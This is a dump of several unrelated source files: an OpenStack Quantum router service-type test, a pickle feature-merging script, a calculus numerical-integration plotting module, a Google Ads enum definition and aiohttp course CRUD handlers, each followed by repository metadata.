# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2013 VMware, Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import unittest2 as unittest import webob.exc as webexc import quantum from quantum.api import extensions from quantum.api.v2 import router from quantum.common import config from quantum.db.loadbalancer import loadbalancer_db as lb_db from quantum.db import db_base_plugin_v2 from quantum.db import l3_db from quantum.db import routedserviceinsertion_db as rsi_db from quantum.db import routerservicetype_db as rst_db from quantum.db import servicetype_db as st_db from quantum.extensions import routedserviceinsertion as rsi from quantum.extensions import routerservicetype as rst from quantum.openstack.common import cfg from quantum.plugins.common import constants from quantum.tests.unit import test_api_v2 from quantum.tests.unit import testlib_api from quantum import wsgi _uuid = test_api_v2._uuid _get_path = test_api_v2._get_path extensions_path = ':'.join(quantum.extensions.__path__) class RouterServiceInsertionTestPlugin( rst_db.RouterServiceTypeDbMixin, rsi_db.RoutedServiceInsertionDbMixin, st_db.ServiceTypeManager, lb_db.LoadBalancerPluginDb, l3_db.L3_NAT_db_mixin, db_base_plugin_v2.QuantumDbPluginV2): supported_extension_aliases = [ "router", "router-service-type", "routed-service-insertion", "service-type", "lbaas" ] def create_router(self, context, router): with context.session.begin(subtransactions=True): r = 
super(RouterServiceInsertionTestPlugin, self).create_router( context, router) service_type_id = router['router'].get(rst.SERVICE_TYPE_ID) if service_type_id is not None: r[rst.SERVICE_TYPE_ID] = service_type_id self._process_create_router_service_type_id( context, r) return r def get_router(self, context, id, fields=None): with context.session.begin(subtransactions=True): r = super(RouterServiceInsertionTestPlugin, self).get_router( context, id, fields) rsbind = self._get_router_service_type_id_binding(context, id) if rsbind: r[rst.SERVICE_TYPE_ID] = rsbind['service_type_id'] return r def delete_router(self, context, id): with context.session.begin(subtransactions=True): super(RouterServiceInsertionTestPlugin, self).delete_router( context, id) rsbind = self._get_router_service_type_id_binding(context, id) if rsbind: raise Exception('Router service-type binding is not deleted') def create_resource(self, res, context, resource, model): with context.session.begin(subtransactions=True): method_name = "create_{0}".format(res) method = getattr(super(RouterServiceInsertionTestPlugin, self), method_name) o = method(context, resource) router_id = resource[res].get(rsi.ROUTER_ID) if router_id is not None: o[rsi.ROUTER_ID] = router_id self._process_create_resource_router_id( context, o, model) return o def get_resource(self, res, context, id, fields, model): method_name = "get_{0}".format(res) method = getattr(super(RouterServiceInsertionTestPlugin, self), method_name) o = method(context, id, fields) if fields is None or rsi.ROUTER_ID in fields: rsbind = self._get_resource_router_id_binding( context, id, model) if rsbind: o[rsi.ROUTER_ID] = rsbind['router_id'] return o def delete_resource(self, res, context, id, model): method_name = "delete_{0}".format(res) with context.session.begin(subtransactions=True): method = getattr(super(RouterServiceInsertionTestPlugin, self), method_name) method(context, id) self._delete_resource_router_id_binding(context, id, model) if 
self._get_resource_router_id_binding(context, id, model): raise Exception("{0}-router binding is not deleted".format(res)) def create_pool(self, context, pool): return self.create_resource('pool', context, pool, lb_db.Pool) def get_pool(self, context, id, fields=None): return self.get_resource('pool', context, id, fields, lb_db.Pool) def delete_pool(self, context, id): return self.delete_resource('pool', context, id, lb_db.Pool) def create_health_monitor(self, context, health_monitor): return self.create_resource('health_monitor', context, health_monitor, lb_db.HealthMonitor) def get_health_monitor(self, context, id, fields=None): return self.get_resource('health_monitor', context, id, fields, lb_db.HealthMonitor) def delete_health_monitor(self, context, id): return self.delete_resource('health_monitor', context, id, lb_db.HealthMonitor) def create_vip(self, context, vip): return self.create_resource('vip', context, vip, lb_db.Vip) def get_vip(self, context, id, fields=None): return self.get_resource( 'vip', context, id, fields, lb_db.Vip) def delete_vip(self, context, id): return self.delete_resource('vip', context, id, lb_db.Vip) def stats(self, context, pool_id): pass class RouterServiceInsertionTestCase(unittest.TestCase): def setUp(self): plugin = ( "quantum.tests.unit.test_routerserviceinsertion." 
"RouterServiceInsertionTestPlugin" ) # point config file to: quantum/tests/etc/quantum.conf.test args = ['--config-file', test_api_v2.etcdir('quantum.conf.test')] config.parse(args=args) #just stubbing core plugin with LoadBalancer plugin cfg.CONF.set_override('core_plugin', plugin) cfg.CONF.set_override('service_plugins', [plugin]) cfg.CONF.set_override('quota_router', -1, group='QUOTAS') # Ensure 'stale' patched copies of the plugin are never returned quantum.manager.QuantumManager._instance = None # Ensure existing ExtensionManager is not used ext_mgr = extensions.PluginAwareExtensionManager( extensions_path, {constants.LOADBALANCER: RouterServiceInsertionTestPlugin()} ) extensions.PluginAwareExtensionManager._instance = ext_mgr router.APIRouter() app = config.load_paste_app('extensions_test_app') self._api = extensions.ExtensionMiddleware(app, ext_mgr=ext_mgr) self._tenant_id = "8c70909f-b081-452d-872b-df48e6c355d1" res = self._do_request('GET', _get_path('service-types')) self._service_type_id = res['service_types'][0]['id'] def tearDown(self): self._api = None cfg.CONF.reset() def _do_request(self, method, path, data=None, params=None, action=None): content_type = 'application/json' body = None if data is not None: # empty dict is valid body = wsgi.Serializer().serialize(data, content_type) req = testlib_api.create_request( path, body, content_type, method, query_string=params) res = req.get_response(self._api) if res.status_code >= 400: raise webexc.HTTPClientError(detail=res.body, code=res.status_code) if res.status_code != webexc.HTTPNoContent.code: return res.json def _router_create(self, service_type_id=None): data = { "router": { "tenant_id": self._tenant_id, "name": "test", "admin_state_up": True, "service_type_id": service_type_id, } } res = self._do_request('POST', _get_path('routers'), data) return res['router'] def test_router_create_no_service_type_id(self): router = self._router_create() self.assertEqual(router.get('service_type_id'), None) def 
test_router_create_with_service_type_id(self): router = self._router_create(self._service_type_id) self.assertEqual(router['service_type_id'], self._service_type_id) def test_router_get(self): router = self._router_create(self._service_type_id) res = self._do_request('GET', _get_path('routers/{0}'.format(router['id']))) self.assertEqual(res['router']['service_type_id'], self._service_type_id) def _test_router_update(self, update_service_type_id): router = self._router_create(self._service_type_id) router_id = router['id'] new_name = _uuid() data = { "router": { "name": new_name, "admin_state_up": router['admin_state_up'], } } if update_service_type_id: data["router"]["service_type_id"] = _uuid() with self.assertRaises(webexc.HTTPClientError) as ctx_manager: res = self._do_request( 'PUT', _get_path('routers/{0}'.format(router_id)), data) self.assertEqual(ctx_manager.exception.code, 400) else: res = self._do_request( 'PUT', _get_path('routers/{0}'.format(router_id)), data) res = self._do_request( 'GET', _get_path('routers/{0}'.format(router['id']))) self.assertEqual(res['router']['name'], new_name) def test_router_update_with_service_type_id(self): self._test_router_update(True) def test_router_update_without_service_type_id(self): self._test_router_update(False) def test_router_delete(self): router = self._router_create(self._service_type_id) self._do_request( 'DELETE', _get_path('routers/{0}'.format(router['id']))) def _test_lb_setup(self): self._subnet_id = _uuid() router = self._router_create(self._service_type_id) self._router_id = router['id'] def _test_pool_setup(self): self._test_lb_setup() def _test_health_monitor_setup(self): self._test_lb_setup() def _test_vip_setup(self): self._test_pool_setup() pool = self._pool_create(self._router_id) self._pool_id = pool['id'] def _create_resource(self, res, data): resp = self._do_request('POST', _get_path('lb/{0}s'.format(res)), data) return resp[res] def _pool_create(self, router_id=None): data = { "pool": { 
"tenant_id": self._tenant_id, "name": "test", "protocol": "HTTP", "subnet_id": self._subnet_id, "lb_method": "ROUND_ROBIN", "router_id": router_id } } return self._create_resource('pool', data) def _pool_update_attrs(self, pool): uattr = {} fields = [ 'name', 'description', 'lb_method', 'health_monitors', 'admin_state_up' ] for field in fields: uattr[field] = pool[field] return uattr def _health_monitor_create(self, router_id=None): data = { "health_monitor": { "tenant_id": self._tenant_id, "type": "HTTP", "delay": 1, "timeout": 1, "max_retries": 1, "router_id": router_id } } return self._create_resource('health_monitor', data) def _health_monitor_update_attrs(self, hm): uattr = {} fields = ['delay', 'timeout', 'max_retries'] for field in fields: uattr[field] = hm[field] return uattr def _vip_create(self, router_id=None): data = { "vip": { "tenant_id": self._tenant_id, "name": "test", "protocol": "HTTP", "port": 80, "subnet_id": self._subnet_id, "pool_id": self._pool_id, "address": "192.168.1.101", "connection_limit": 100, "admin_state_up": True, "router_id": router_id } } return self._create_resource('vip', data) def _vip_update_attrs(self, vip): uattr = {} fields = [ 'name', 'description', 'pool_id', 'connection_limit', 'admin_state_up' ] for field in fields: uattr[field] = vip[field] return uattr def _test_resource_create(self, res): getattr(self, "_test_{0}_setup".format(res))() obj = getattr(self, "_{0}_create".format(res))() obj = getattr(self, "_{0}_create".format(res))(self._router_id) self.assertEqual(obj['router_id'], self._router_id) def _test_resource_update(self, res, update_router_id, update_attr, update_value): getattr(self, "_test_{0}_setup".format(res))() obj = getattr(self, "_{0}_create".format(res))(self._router_id) uattrs = getattr(self, "_{0}_update_attrs".format(res))(obj) uattrs[update_attr] = update_value data = {res: uattrs} if update_router_id: uattrs['router_id'] = self._router_id with self.assertRaises(webexc.HTTPClientError) as 
ctx_manager: newobj = self._do_request( 'PUT', _get_path('lb/{0}s/{1}'.format(res, obj['id'])), data) self.assertEqual(ctx_manager.exception.code, 400) else: newobj = self._do_request( 'PUT', _get_path('lb/{0}s/{1}'.format(res, obj['id'])), data) updated = self._do_request( 'GET', _get_path('lb/{0}s/{1}'.format(res, obj['id']))) self.assertEqual(updated[res][update_attr], update_value) def _test_resource_delete(self, res): getattr(self, "_test_{0}_setup".format(res))() obj = getattr(self, "_{0}_create".format(res))() self._do_request( 'DELETE', _get_path('lb/{0}s/{1}'.format(res, obj['id']))) obj = getattr(self, "_{0}_create".format(res))(self._router_id) self._do_request( 'DELETE', _get_path('lb/{0}s/{1}'.format(res, obj['id']))) def test_pool_create(self): self._test_resource_create('pool') def test_pool_update_with_router_id(self): self._test_resource_update('pool', True, 'name', _uuid()) def test_pool_update_without_router_id(self): self._test_resource_update('pool', False, 'name', _uuid()) def test_pool_delete(self): self._test_resource_delete('pool') def test_health_monitor_create(self): self._test_resource_create('health_monitor') def test_health_monitor_update_with_router_id(self): self._test_resource_update('health_monitor', True, 'timeout', 2) def test_health_monitor_update_without_router_id(self): self._test_resource_update('health_monitor', False, 'timeout', 2) def test_health_monitor_delete(self): self._test_resource_delete('health_monitor') def test_vip_create(self): self._test_resource_create('vip') def test_vip_update_with_router_id(self): self._test_resource_update('vip', True, 'name', _uuid()) def test_vip_update_without_router_id(self): self._test_resource_update('vip', False, 'name', _uuid()) def test_vip_delete(self): self._test_resource_delete('vip')
[ "fank@vmware.com" ]
fank@vmware.com
d30b2d899932c4a3c83284b2c6de91a631b995de
7f52cfb2fb4f09a14ada450862bab25af19cb151
/merge_data.py
5b5b6fcc24e023f854acf30ff74bba31ba11acc2
[]
no_license
shahumang19/Periocular-Recognition
e63d33e3c3393ba42f9342f6ed0729b1595aedfd
640b82d31dc79e7bbb46c88433c6561c0f011fa5
refs/heads/master
2022-12-17T23:04:33.959009
2020-08-11T06:59:50
2020-08-11T06:59:50
285,555,399
2
0
null
null
null
null
UTF-8
Python
false
false
735
py
import os, pickle
import numpy as np

# Pickled feature batches to merge (left/right eye, two batches each).
F1 = "data\\leye_features1.pkl"
F2 = "data\\leye_features2.pkl"
F3 = "data\\reye_features1.pkl"
F4 = "data\\reye_features2.pkl"
FILES = [F1, F2, F3, F4]

# FIX: the original grew `features` with np.append inside the loop, which
# reallocates and copies the whole array on every iteration (quadratic).
# Collect the parts first and concatenate exactly once instead.  This also
# avoids aliasing the first file's label list into `labels`.
feature_parts = []
labels = []

for file1 in FILES:
    with open(file1, "rb") as f1:
        data = pickle.load(f1)
    # Each file stores {"features": ndarray, "labels": list}.
    feature_parts.append(data["features"])
    labels.extend(data["labels"])

features = np.concatenate(feature_parts, axis=0)

print(features.shape)
print(len(labels))

fn = "data\\merged_features.pkl"
with open(fn, "wb") as fl:
    pickle.dump({"features": features, "labels": labels}, fl)

print(f"{fn} saved...")
[ "shahumang19@gmail.com" ]
shahumang19@gmail.com
c45249ab30242a6a3642d0f3e42f0ce53576fc53
22d8b1250e0b5178e03ff4843e1f79243d35821e
/areaTools.py
0f984d5166bd8f3ce473a566711fdfec02894819
[]
no_license
kmcquighan/Calc-II-Numerical-Methods
98350b76973cf44d481353cfc981efc8b6875a9c
d22a4eabd327f516308093ffa93701de2bdf8042
refs/heads/master
2020-05-27T21:10:54.887481
2017-03-24T15:42:07
2017-03-24T15:42:07
83,606,852
1
2
null
null
null
null
UTF-8
Python
false
false
12,176
py
# -*- coding: utf-8 -*-
"""
by Kelly McQuighan 2017

These tools can be used to visualize different numerical integration schemes,
and to compute the associated error. They can also be used to find the order
of various numerical schemes.
"""
from matplotlib import pyplot as plt
from numpy import *  # NOTE(review): wildcard import kept — user notebooks may rely on the names it exposes
import numpy as np
import scipy.integrate as inte
import scipy.interpolate as interp
import matplotlib as mpl

mpl.rcParams['font.size'] = 17
# One color/linestyle per method: left, right, midpoint, trapezoid, Simpson.
colors = ['#0058AF', '#FF8000', '#D682FF', '#00693C', '#E02102']
styles = ['-', ':', '-', ':', '-']


def plots(func, a, b, n, method, ax):
    """Plot f on (a slightly padded) [a, b] and shade the regions used by one
    quadrature method with n subintervals on the given matplotlib axis.

    method is one of 'left', 'right', 'midpoint', 'trapezoid', 'simpson'
    (case-insensitive).  Simpson fits a parabola over pairs of intervals, so
    it assumes n is even.
    """
    ax.axvline(0., color='#666666', linewidth=1)
    ax.axhline(0., color='#666666', linewidth=1)
    # Extend the plotted window 10% beyond [a, b], always including x = 0.
    if a > 0:
        xlarge = np.linspace(0., 1.1 * b, 1000)
    elif b < 0:
        xlarge = np.linspace(1.1 * a, 0., 1000)
    else:
        xlarge = np.linspace(1.1 * a, 1.1 * b, 1000)
    flarge = func(xlarge)
    ax.plot(xlarge, flarge, 'b', linewidth=5)
    ax.set_xlim([xlarge[0], xlarge[999]])
    smallest = np.min(flarge)
    largest = np.max(flarge)
    dx = (b - a) / n
    xs = np.linspace(a, b, n + 1)
    fxs = func(xs)
    if method.lower() == 'left':
        # Rectangle height taken from the left endpoint of each subinterval.
        for i in range(n):
            points = [[xs[i], 0], [xs[i], fxs[i]], [xs[i + 1], fxs[i]], [xs[i + 1], 0]]
            poly = plt.Polygon(points, fc='g', edgecolor='g', alpha=0.3, linewidth=3)
            ax.add_patch(poly)
    elif method.lower() == 'right':
        # Rectangle height taken from the right endpoint.
        for i in range(n):
            points = [[xs[i], 0], [xs[i], fxs[i + 1]], [xs[i + 1], fxs[i + 1]], [xs[i + 1], 0]]
            poly = plt.Polygon(points, fc='g', edgecolor='g', alpha=0.3, linewidth=3)
            ax.add_patch(poly)
    elif method.lower() == 'midpoint':
        # Rectangle height taken at subinterval midpoints.
        x = np.linspace(a + dx / 2., b - dx / 2., n)
        fx = func(x)
        for i in range(n):
            points = [[xs[i], 0], [xs[i], fx[i]], [xs[i + 1], fx[i]], [xs[i + 1], 0]]
            poly = plt.Polygon(points, fc='g', edgecolor='g', alpha=0.3, linewidth=3)
            ax.add_patch(poly)
    elif method.lower() == 'trapezoid':
        for i in range(n):
            points = [[xs[i], 0], [xs[i], fxs[i]], [xs[i + 1], fxs[i + 1]], [xs[i + 1], 0]]
            poly = plt.Polygon(points, fc='g', edgecolor='g', alpha=0.3, linewidth=3)
            ax.add_patch(poly)
    elif method.lower() == 'simpson':
        # note: this implementation keeps the number of grid points the same
        for i in range(0, n, 2):
            lag = interp.lagrange([xs[i], xs[i + 1], xs[i + 2]],
                                  [fxs[i], fxs[i + 1], fxs[i + 2]])
            section = np.linspace(xs[i], xs[i + 2], 100)
            fsec = lag(section)
            ax.fill_between(section, fsec, facecolor='g', edgecolor='g',
                            alpha=0.3, linewidth=3)
        # FIX: n//2 — np.linspace requires an integer sample count; under
        # Python 3, n/2 is a float and raised TypeError.
        x_mid = np.linspace(a + dx, b - dx, n // 2)
        vert = np.ones(100)
        for the_x in x_mid:
            ax.plot(the_x * vert, np.linspace(0, func(the_x), 100), 'g--',
                    linewidth=3, alpha=0.5)
    else:
        print('ERROR: You have not specified a valid method. Please check for typos.')
    # Always anchor the y-window at zero when the function does not cross it.
    if smallest > 0:
        ax.set_ylim([0, 1.1 * largest])
    elif largest < 0:
        ax.set_ylim([1.1 * smallest, 0])
    else:
        ax.set_ylim([1.1 * smallest, 1.1 * largest])
    ax.set_xlabel('x')
    ax.set_ylabel('f(x)')


def plotArea(f, a, b, n):
    """Draw all five methods side by side for f (a string expression in x)
    on [eval(a), eval(b)] with n subintervals, plus a bar chart of each
    method's absolute error against scipy.integrate.quad.
    """
    a = eval(a)
    b = eval(b)
    if n < 1:
        n = 1
        print('ERROR: n must be greater than zero. setting n=1.')
    func = eval("lambda x: " + f)
    I = inte.quad(func, a, b)[0]  # reference "exact" value
    fig = plt.figure(figsize=(15, 6))
    ax1 = fig.add_subplot(2, 3, 1)
    ax2 = fig.add_subplot(2, 3, 2)
    ax3 = fig.add_subplot(2, 3, 3)
    ax4 = fig.add_subplot(2, 3, 4)
    ax5 = fig.add_subplot(2, 3, 5)
    ax6 = fig.add_subplot(2, 3, 6)
    plots(func, a, b, n, "left", ax1)
    plots(func, a, b, n, "right", ax2)
    plots(func, a, b, n, "midpoint", ax3)
    plots(func, a, b, n, "trapezoid", ax4)
    plots(func, a, b, n, "simpson", ax5)
    area1 = evalArea(func, a, b, n, "left")
    area2 = evalArea(func, a, b, n, "right")
    area3 = evalArea(func, a, b, n, "midpoint")
    area4 = evalArea(func, a, b, n, "trapezoid")
    area5 = evalArea(func, a, b, n, "simpson")
    err1 = np.abs(area1 - I)
    err2 = np.abs(area2 - I)
    err3 = np.abs(area3 - I)
    err4 = np.abs(area4 - I)
    err5 = np.abs(area5 - I)
    # Clamp errors at machine precision to zero so the bar chart is honest.
    if not check_error(err1):
        err1 = 0
    if not check_error(err2):
        err2 = 0
    if not check_error(err3):
        err3 = 0
    if not check_error(err4):
        err4 = 0
    if not check_error(err5):
        err5 = 0
    ax6.bar(range(5), [err1, err2, err3, err4, err5])
    ax6.set_xticks(range(5))
    ax6.set_xticklabels(['left', 'right', 'mid', 'trap', 'Simp'], rotation=70)
    ax6.axhline(0, color='k', linewidth=1)
    plt.tight_layout(pad=0.4, w_pad=0.5, h_pad=5.5)
    plt.suptitle('f(x) = ' + f + ', Area = %.3f, n=%d' % (I, n), fontsize=20, y=1.2)
    ax1.set_title('Method "Left"\n Approximate area:%.5f \n Absolute error: %.2e' % (area1, err1))
    ax2.set_title('Method "Right"\n Approximate area:%.5f \n Absolute error: %.2e' % (area2, err2))
    ax3.set_title('Method "Midpoint"\n Approximate area:%.5f \n Absolute error: %.2e' % (area3, err3))
    ax4.set_title('Method "Trapezoid"\n Approximate area:%.5f \n Absolute error: %.2e' % (area4, err4))
    ax5.set_title('Method "Simpson"\n Approximate area:%.5f \n Absolute error: %.2e' % (area5, err5))
    ax6.set_title('Absolute error for each method\n')
    plt.show()


def plot3Areas(f, a, b, n, method):
    """Plot one method at n, 2n and 4n subintervals and report how the error
    decreases as the grid is refined.  f, a, b are string expressions.
    """
    a = eval(a)
    b = eval(b)
    func = eval("lambda x: " + f)
    I = inte.quad(func, a, b)[0]
    plt.figure(figsize=(15, 4))
    ax1 = plt.subplot2grid((4, 3), (0, 0), rowspan=3)
    ax2 = plt.subplot2grid((4, 3), (0, 1), rowspan=3)
    ax3 = plt.subplot2grid((4, 3), (0, 2), rowspan=3)
    ax0 = plt.subplot2grid((4, 3), (3, 0), colspan=3)  # text-only strip
    ax0.axis('off')
    plots(func, a, b, n, method, ax1)
    plots(func, a, b, 2 * n, method, ax2)
    plots(func, a, b, 4 * n, method, ax3)
    area1 = evalArea(func, a, b, n, method)
    area2 = evalArea(func, a, b, 2 * n, method)
    area3 = evalArea(func, a, b, 4 * n, method)
    err1 = np.abs(area1 - I)
    err2 = np.abs(area2 - I)
    err3 = np.abs(area3 - I)
    plt.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)
    plt.suptitle('f(x) = ' + f + ', Method: ' + method + ', Area = %.3f' % I,
                 fontsize=20, y=1.4)
    ax1.set_title('n=%d \n Approximate area:%.5f \n Absolute error: %.2e' % (n, area1, err1))
    ax2.set_title('n=%d \n Approximate area:%.5f \n Absolute error: %.2e' % (2 * n, area2, err2))
    ax3.set_title('n=%d \n Approximate area:%.5f \n Absolute error: %.2e' % (4 * n, area3, err3))
    if not check_error(err1):
        # FIX: the original call was missing the x, y position arguments,
        # so Axes.text raised TypeError whenever this branch was reached.
        ax0.text(0.0, 1.,
                 'Using method ' + method + ' to find the area under f(x) = ' + f +
                 ' returns no errors, so it does not make sense to compare the errors '
                 'for different numbers of sub-intervals.',
                 ha='left', va='top', fontsize=20, transform=ax0.transAxes)
    else:
        ax0.text(0.0, 1.,
                 'When using method ' + method + ' to compute the area under f(x) = ' + f + ':\n' +
                 '- In doubling the number of subintervals from n=%d to n=%d the error was decreased by a factor of %.2f\n' % (n, 2 * n, err1 / err2) +
                 '- In doubling the number of subintervals from n=%d to n=%d the error was decreased by a factor of %.2f' % (2 * n, 4 * n, err2 / err3),
                 ha='left', va='top', fontsize=20, transform=ax0.transAxes)
    plt.show()


def plotAllMethods(f, a, b, n):
    """Show the three-panel refinement figure for every method.

    Currently unused by the Notebook because it refreshes in an awkward way;
    prefer plot3Areas with a Dropdown box for the method type.
    """
    if n < 1:
        n = 1
        print('ERROR: n must be greater than zero. setting n=1.')
    # FIX: pass f, a, b through unchanged — plot3Areas eval()s its own
    # arguments, so pre-converting them here made every call below raise.
    plot3Areas(f, a, b, n, "left")
    plot3Areas(f, a, b, n, "right")
    plot3Areas(f, a, b, n, "midpoint")
    plot3Areas(f, a, b, n, "trapezoid")
    plot3Areas(f, a, b, n, "simpson")
    plt.show()


def evalArea(func, a, b, n, method):
    """Approximate the integral of func over [a, b] with n subintervals.

    method is one of 'left', 'right', 'midpoint', 'trapezoid', 'simpson'
    (case-insensitive).  Simpson assumes n is even.  Returns the scalar
    approximation (raises NameError on an unknown method, as before).
    """
    dx = (b - a) / n
    if method.lower() == 'left':
        x = np.linspace(a, b - dx, n)
        fx = func(x)
        area = np.sum(fx) * dx
    elif method.lower() == 'right':
        x = np.linspace(a + dx, b, n)
        fx = func(x)
        area = np.sum(fx) * dx
    elif method.lower() == 'midpoint':
        x = np.linspace(a + dx / 2., b - dx / 2., n)
        fx = func(x)
        area = np.sum(fx) * dx
    elif method.lower() == 'trapezoid':
        # Interior points weighted 1, endpoints weighted 1/2.
        x = np.linspace(a + dx, b - dx, n - 1)
        fx = func(x)
        area = dx * (0.5 * func(a) + 0.5 * func(b) + np.sum(fx))
    elif method.lower() == 'simpson':
        # FIX: integer counts (n//2) — np.linspace rejects float sample
        # counts under Python 3 division.
        x_mid = np.linspace(a + dx, b - dx, n // 2)
        x_trap = np.linspace(a + 2 * dx, b - 2 * dx, n // 2 - 1)
        fx_mid = func(x_mid)
        fx_trap = func(x_trap)
        area = dx / 3. * (4 * np.sum(fx_mid) + func(a) + func(b) + 2 * np.sum(fx_trap))
    else:
        print('ERROR: You have not specified a valid method. Please check for typos.')
    return area


def check_error(err):
    """Return True when err is meaningfully above machine precision.

    Comparing error decay is pointless once errors hit round-off (e.g. any
    method integrates a constant exactly).
    """
    epsilon = 7. / 3 - 4. / 3 - 1  # classic trick: evaluates to machine epsilon
    return err > 100 * epsilon


def compareMethods(f, a, b):
    """Log-log plot of error vs. subinterval count for all five methods.

    The slope of each curve gives the order of the method.  f and a are
    string expressions; b must parse as a float.
    """
    n = 8
    a = eval(a)
    b = float(b)
    if n < 1:
        n = 1
        print('ERROR: n must be greater than zero. setting n=1.')
    func = eval("lambda x: " + f)
    I = inte.quad(func, a, b)[0]
    n = int(n)
    if n < 1:
        n = 1
    errors = np.ones((5, 6))  # methods in rows, errors in columns
    ns = np.zeros((6))
    for i in range(6):
        errors[0, i] = np.abs(I - evalArea(func, a, b, 2**i * n, 'left'))
        errors[1, i] = np.abs(I - evalArea(func, a, b, 2**i * n, 'right'))
        errors[2, i] = np.abs(I - evalArea(func, a, b, 2**i * n, 'midpoint'))
        errors[3, i] = np.abs(I - evalArea(func, a, b, 2**i * n, 'trapezoid'))
        errors[4, i] = np.abs(I - evalArea(func, a, b, 2**i * n, 'simpson'))
        ns[i] = i
    fig = plt.figure(figsize=(10, 5))
    ax = fig.gca()
    ax.set_xlabel(r'$\log_2(n/4)$')
    ax.set_ylabel(r'$\log_2(error_i/error_1)$')
    ax.set_title('log-log plot of the error versus the number of subintervals.\n f(x) = ' + f)
    labels = ['Left Riemann', 'Right Riemann', 'Midpoint', 'Trapezoid', 'Simpson']
    for i in range(5):
        if check_error(errors[i, 0]):
            # Normalize by the coarsest-grid error so all curves start at 0.
            log_errors = np.log(errors[i, :] / errors[i, 0]) / np.log(2)
            plt.plot(ns, log_errors, linewidth=6, color=colors[i],
                     linestyle=styles[i], label=labels[i])
            poly1 = np.polyfit(ns, log_errors, 1)
            print('Using method ' + labels[i] + ' the slope of the log-log plot is %.2f' % poly1[0])
        else:
            print(r'Using method ' + labels[i] + ' the errors are less than machine precision for n=8 already!')
    plt.legend(loc=3)
    plt.axhline(0.0, 0, 5, color='k', linewidth=1)
    ax.set_xlim([0, 5])
    plt.show()
[ "noreply@github.com" ]
noreply@github.com
c2191030e2543c62287b31ad7e253f8767252f1c
9ae6ce54bf9a2a86201961fdbd5e7b0ec913ff56
/google/ads/googleads/v9/enums/types/feed_item_quality_approval_status.py
2b7fc3c81f16e8f0168b1a99e3484c10977c937b
[ "Apache-2.0" ]
permissive
GerhardusM/google-ads-python
73b275a06e5401e6b951a6cd99af98c247e34aa3
676ac5fcb5bec0d9b5897f4c950049dac5647555
refs/heads/master
2022-07-06T19:05:50.932553
2022-06-17T20:41:17
2022-06-17T20:41:17
207,535,443
0
0
Apache-2.0
2019-09-10T10:58:55
2019-09-10T10:58:55
null
UTF-8
Python
false
false
1,260
py
# -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import proto # type: ignore __protobuf__ = proto.module( package="google.ads.googleads.v9.enums", marshal="google.ads.googleads.v9", manifest={"FeedItemQualityApprovalStatusEnum",}, ) class FeedItemQualityApprovalStatusEnum(proto.Message): r"""Container for enum describing possible quality evaluation approval statuses of a feed item. """ class FeedItemQualityApprovalStatus(proto.Enum): r"""The possible quality evaluation approval statuses of a feed item. """ UNSPECIFIED = 0 UNKNOWN = 1 APPROVED = 2 DISAPPROVED = 3 __all__ = tuple(sorted(__protobuf__.manifest))
[ "noreply@github.com" ]
noreply@github.com
cfdbb2f58717e16d81d08e87d8d9d40cf2a66e9c
a8e5e85cd1d3210f3e404faa35654e02ba52a7af
/py作业/serv/course_actions.py
a7d8fdd99701f1c1546574c2baed2d51e36addc4
[]
no_license
Lizhupu-0802/gradesystem
6b56299642d819139bc3a3c9415adbc764cd89d5
9c57d112fb840379a91236a278fcbe829609ec61
refs/heads/main
2023-02-01T21:44:59.597086
2020-12-19T05:47:44
2020-12-19T05:47:44
321,072,394
0
0
null
null
null
null
UTF-8
Python
false
false
2,308
py
from aiohttp import web
import psycopg2.errors
from urllib.parse import urlencode
from .config import db_block, web_routes


@web_routes.post('/action/course/add')
async def action_course_add(request):
    """Create a course from the posted form fields no/name/score/attr.

    Returns 400 when a field is missing, redirects to /error (with a
    message) when the course number already exists, otherwise redirects
    to /course.
    """
    params = await request.post()
    param_fields = ['no', 'name', 'score', 'attr', ]
    param_values = {field: params.get(field) for field in param_fields}
    # All four fields are mandatory.
    for field, value in param_values.items():
        if value is None:
            return web.HTTPBadRequest(text=f"{field} must be required")
    try:
        with db_block() as db:
            db.execute("""
            INSERT INTO course (no, name, score, attr)
            VALUES ( %(no)s, %(name)s, %(score)s, %(attr)s)
            """, param_values)
    except psycopg2.errors.UniqueViolation:
        # Duplicate course number: bounce to the error page with a message.
        query = urlencode({
            "message": "已经添加该课程号课程",
            "return": "/course"
        })
        return web.HTTPFound(location=f"/error?{query}")
    return web.HTTPFound(location="/course")


@web_routes.post('/action/course/edit/{sn}')
async def edit_course_action(request):
    """Update the course identified by serial number `sn` in the URL."""
    sn = request.match_info.get("sn")
    if sn is None:
        return web.HTTPBadRequest(text="sn, must be required")
    params = await request.post()
    param_fields = ['no', 'name', 'score', 'attr', ]
    param_values = {field: params.get(field) for field in param_fields}
    for field, value in param_values.items():
        if value is None:
            return web.HTTPBadRequest(text=f"{field} must be required")
    # sn and score must be integers; reject non-numeric input up front.
    try:
        param_values['sn'] = int(sn)
        param_values['score'] = int(param_values['score'])
    except ValueError:
        return web.HTTPBadRequest(text="invalid value")
    with db_block() as db:
        db.execute("""
        UPDATE course SET no=%(no)s, name=%(name)s, score=%(score)s, attr=%(attr)s
        WHERE sn = %(sn)s
        """, param_values)
    return web.HTTPFound(location="/course")


@web_routes.post('/action/course/delete/{sn}')
async def delete_course_action(request):
    """Delete the course with the given serial number, then redirect.

    FIX: declared ``async`` — aiohttp route handlers must be coroutines;
    the original plain ``def`` was inconsistent with the other handlers
    in this module and would not be accepted by the router.
    """
    sn = request.match_info.get("sn")
    if sn is None:
        return web.HTTPBadRequest(text="sn must be required")
    with db_block() as db:
        db.execute("""
        DELETE FROM course WHERE sn = %(sn)s
        """, dict(sn=sn))
    return web.HTTPFound(location="/course")
[ "noreply@github.com" ]
noreply@github.com
7824a3129a4b0602e416b5f8eb4533f577abb87f
